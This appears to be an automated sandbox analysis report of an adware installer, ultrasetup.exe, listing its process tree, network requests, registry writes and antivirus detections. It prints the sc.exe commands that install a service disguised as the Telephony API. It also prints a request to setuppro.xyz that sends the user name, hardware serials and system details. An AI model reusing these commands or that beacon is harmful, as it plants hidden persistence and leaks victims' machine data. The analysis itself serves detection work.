Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Aug. 26, 2022, 5:42 p.m. | Aug. 26, 2022, 5:45 p.m. |
-
-
ultrasetup.tmp "C:\Users\test22\AppData\Local\Temp\is-35A0F.tmp\ultrasetup.tmp" /SL5="$B0138,1092675,831488,C:\Users\test22\AppData\Local\Temp\ultrasetup.exe"
2912-
-
ultrasetup.tmp "C:\Users\test22\AppData\Local\Temp\is-UNNOR.tmp\ultrasetup.tmp" /SL5="$C0138,1092675,831488,C:\Users\test22\AppData\Local\Temp\ultrasetup.exe" /VERYSILENT
2140-
sc.exe "C:\Windows\system32\sc.exe" create Telephone404 start= auto DisplayName= "Telephone404" binPath= "C:\Windows\test22-pc\Runtimebroker8.exe"
2176 -
sc.exe "C:\Windows\system32\sc.exe" description Telephone404 "Provides Telephony API (TAPI) support for programs that control telephony devices on the local computer and, through the LAN, on servers that are also running the service."
2280 -
sc.exe "C:\Windows\system32\sc.exe" start Telephone404
2404
-
-
-
-
-
explorer.exe C:\Windows\Explorer.EXE
1156
Name | Response | Post-Analysis Lookup |
---|---|---|
setuppro.xyz | 74.208.236.195 |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
section | .itext |
section | .didata |
suspicious_features | GET method with no useragent header | suspicious_request | GET http://setuppro.xyz/guid.php | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://setuppro.xyz/express.php?uid=25528BB73ece216 |
request | GET http://setuppro.xyz/iam/ins.php?SMAC=&User=test22<o>PC<q>test22&UUID=25528BB7-B449-A342-B397-00D24064AA0D&Vendor=innotekGmbH&Name=VirtualBox&HDDSerialNumber=VB4b297b00-73ece216&Caption=MicrosoftWindows7ProfessionalKN&OSArchitectures=64-bit&OSerialNumber=61417-561-4045436-92488&ProcessorName=Intel(R)Core(TM)i5-8400CPU@2.80GHz&RAM=5368242176&version=1.52&publisherid=installer |
request | GET http://setuppro.xyz/iam/i.php?mid=25528BB73ece216&mac=&publisherid=installer&company=youk&pubid=0&advid=0 |
request | GET http://setuppro.xyz/guid.php |
request | GET http://setuppro.xyz/express.php?uid=25528BB73ece216 |
file | C:\Users\test22\AppData\Local\Temp\is-35A0F.tmp\ultrasetup.tmp |
cmdline | "C:\Windows\system32\sc.exe" start Telephone404 |
cmdline | "C:\Windows\system32\sc.exe" description Telephone404 "Provides Telephony API (TAPI) support for programs that control telephony devices on the local computer and, through the LAN, on servers that are also running the service." |
cmdline | "C:\Windows\system32\sc.exe" create Telephone404 start= auto DisplayName= "Telephone404" binPath= "C:\Windows\test22-pc\Runtimebroker8.exe" |
service_name | Telephone404 | service_path | C:\Windows\test22-pc\Runtimebroker8.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0018.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_002.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Support_Chat_001.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0015.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Support Chat.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_003.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0012.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_008.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_004.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0011.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_005.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0010.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0017.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_007.exe |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BEHAVIORS\Support Chat.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0019.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0020.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0013.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0016.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_009.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0014.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_006.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_001.exe |
Lionic | Heuristic.File.Generic.00x1!p |
Cynet | Malicious (score: 100) |
McAfee | Artemis!036CAB509F3D |
Cylance | Unsafe |
Sangfor | Adware.Win32.Installcommerce.Vuvx |
K7AntiVirus | Adware ( 00588bef1 ) |
Alibaba | AdWare:Win32/InstallCommerce.28e3927d |
K7GW | Adware ( 00588bef1 ) |
Cyren | W32/ABAdware.MNTG-9118 |
Symantec | Trojan.Gen.MBT |
Elastic | malicious (high confidence) |
ESET-NOD32 | a variant of Win32/Adware.InstallCommerce.A |
Paloalto | generic.ml |
Kaspersky | Trojan-Spy.Win32.Agent.kbav |
Avast | Win32:AdwareX-gen [Adw] |
Tencent | Win32.Trojan-spy.Agent.Dlc |
McAfee-GW-Edition | BehavesLike.Win32.DStudio.tc |
Sophos | Generic PUA AP (PUA) |
Ikarus | PUA.InstallCommerce |
Avira | ADWARE/Redcap.xmawi |
Gridinsoft | Adware.Win32.Agent.cl |
ZoneAlarm | Trojan-Spy.Win32.Agent.kbav |
GData | Win32.Application.Agent.HK2FNJ |
Detected | |
AhnLab-V3 | Malware/Win.Generic.C5190282 |
Malwarebytes | PUP.Optional.BundleInstaller |
TrendMicro-HouseCall | TROJ_GEN.R002H07G622 |
Rising | Adware.InstallCommerce!8.12CF8 (TFE:5:85cPZ46todH) |
Fortinet | Riskware/InstallCommerce |
AVG | Win32:AdwareX-gen [Adw] |